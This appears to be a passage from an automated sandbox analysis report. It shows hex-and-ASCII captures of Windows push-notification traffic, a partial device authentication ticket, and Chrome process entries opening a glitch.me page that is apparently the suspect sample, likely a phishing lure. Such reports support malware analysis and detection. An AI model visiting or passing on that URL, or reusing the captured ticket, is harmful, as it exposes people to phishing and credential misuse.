            2024-09-29 02:33:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-29 02:33:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 34 46 64 46 2f 4a 37 53 76 30 57 32 58 56 38 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 63 65 36 32 39 65 61 38 36 38 63 35 63 35 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 51 77 45 77 70 55 58 6e 4a 75 4a 48 61 46 43 46 64 44 4b 71 72 74 7a 61 37 68 65 33 74 46 5a 6a 78 64 61 38 61 2f 46 5a 42 30 2f 2b 50 41 63 47 63 77 4f 45 71 67 4b 6a 49 56 4d 61 57 6a 50 6e 63 65 6e 66 53 72 73 72 46 72 54 51 55 56 71 76 79 70 43 42 6a 35 53 75 4f 62 37 68 4b 36 70 68 70 37 55 58 78 38 37 64 35 6e 67 51
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 4FdF/J7Sv0W2XV8/.2Context: bce629ea868c5c58<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUQwEwpUXnJuJHaFCFdDKqrtza7he3tFZjxda8a/FZB0/+PAcGcwOEqgKjIVMaWjPncenfSrsrFrTQUVqvypCBj5SuOb7hK6php7UXx87d5ngQ
            2024-09-29 02:33:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 34 46 64 46 2f 4a 37 53 76 30 57 32 58 56 38 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 63 65 36 32 39 65 61 38 36 38 63 35 63 35 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4FdF/J7Sv0W2XV8/.3Context: bce629ea868c5c58<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-29 02:33:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-29 02:33:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 31 59 4c 4f 65 6d 32 4d 45 47 48 75 42 62 62 6d 44 52 48 77 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: B1YLOem2MEGHuBbbmDRHwA.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination Port
            23192.168.2.64975640.113.110.67443
            TimestampBytes transferredDirectionData
            2024-09-29 02:34:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 53 32 45 4a 54 66 77 67 30 2b 6a 51 57 4d 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 36 39 34 32 33 63 31 31 32 66 62 31 65 33 31 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: ES2EJTfwg0+jQWMc.1Context: 869423c112fb1e31
            2024-09-29 02:34:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-29 02:34:07 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 45 53 32 45 4a 54 66 77 67 30 2b 6a 51 57 4d 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 36 39 34 32 33 63 31 31 32 66 62 31 65 33 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 51 77 45 77 70 55 58 6e 4a 75 4a 48 61 46 43 46 64 44 4b 71 72 74 7a 61 37 68 65 33 74 46 5a 6a 78 64 61 38 61 2f 46 5a 42 30 2f 2b 50 41 63 47 63 77 4f 45 71 67 4b 6a 49 56 4d 61 57 6a 50 6e 63 65 6e 66 53 72 73 72 46 72 54 51 55 56 71 76 79 70 43 42 6a 35 53 75 4f 62 37 68 4b 36 70 68 70 37 55 58 78 38 37 64 35 6e 67 51
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ES2EJTfwg0+jQWMc.2Context: 869423c112fb1e31<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUQwEwpUXnJuJHaFCFdDKqrtza7he3tFZjxda8a/FZB0/+PAcGcwOEqgKjIVMaWjPncenfSrsrFrTQUVqvypCBj5SuOb7hK6php7UXx87d5ngQ
            2024-09-29 02:34:07 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 45 53 32 45 4a 54 66 77 67 30 2b 6a 51 57 4d 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 36 39 34 32 33 63 31 31 32 66 62 31 65 33 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: ES2EJTfwg0+jQWMc.3Context: 869423c112fb1e31<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-29 02:34:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-29 02:34:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2f 47 64 6b 74 47 4c 57 48 6b 65 59 41 36 48 6a 62 35 61 53 6a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: /GdktGLWHkeYA6Hjb5aSjA.0Payload parsing failed.


            Click to jump to process

            Click to jump to process

            Click to jump to process

            Target ID:0
            Start time:22:32:31
            Start date:28/09/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff684c40000
            File size:3'242'272 bytes
            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:22:32:35
            Start date:28/09/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,6098861016623407671,11136246723157708082,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Imagebase:0x7ff684c40000
            File size:3'242'272 bytes
            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:3
            Start time:22:32:38
            Start date:28/09/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://certain-jeweled-verse.glitch.me/newson.htm"
            Imagebase:0x7ff684c40000
            File size:3'242'272 bytes
            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly